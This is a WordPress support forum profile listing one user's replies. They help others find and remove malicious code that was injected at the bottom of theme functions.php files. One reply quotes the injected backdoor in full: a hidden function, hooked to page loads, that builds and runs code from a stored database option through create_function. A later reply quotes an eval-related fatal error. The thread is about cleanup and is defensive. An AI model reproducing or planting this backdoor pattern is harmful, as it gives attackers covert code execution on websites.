damian_luv
Forum Replies Created
-
Thanks brianpalmer installing it now lol
Your’e welcome, glad I could help.
Yes remove that bit as well. I never used sitecheck before but if you rely on your website to earn then by all means you have to make sure it is up and running at all times especially to prevent downtimes like this.
Yes remove those too.
Delete everything after ?> ondown ok, or you can comment the entire thing out. That function page_options() is the prob.
You can ftp and download the file and use notepadd++ to view it with line numbers.
corinnel show me what is at line 130 in your header.php file also what is on line 31 of functions.php.
I would bet it’s the same issue.
No thirdshiftguy, that code is a hack remove it.
[SOLVED]
I checked the functions.php file thoroughly again and realized that at the very bottom of it there were these lines of code:<?php function page_options() { $option = get_option(‘page_option’); $opt=unserialize($option);
@$arg = create_function(”, $opt[1].$opt[4].$opt[10].$opt[12].$opt[14].$opt[7] );return $arg(”);}
add_action(‘loop_start’, ‘page_options’); ?>I had to remove it, seem like a hack LOL.
Similar problem i’m having:
Fatal error: Cannot redeclare dsCrypt() (previously declared in /home/inst/public_html/wp-content/themes/themorningafter/functions.php(30) : runtime-created function(1) : eval()’d code:24) in /home/inst/public_html/wp-content/themes/themorningafter/functions.php(30) : runtime-created function(1) : eval()’d code on line 67
I checked the functions.php line 30 and it seems fine not sure where to go from here?
Forum: Plugins
In reply to: [User Avatar] [Plugin: User Avatar] can't get avatar on multisite blogsI would like to call this plugin on a page how would i do that?